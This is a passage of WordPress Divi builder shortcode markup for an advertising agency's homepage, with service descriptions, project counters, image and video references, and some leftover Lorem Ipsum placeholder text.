use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter 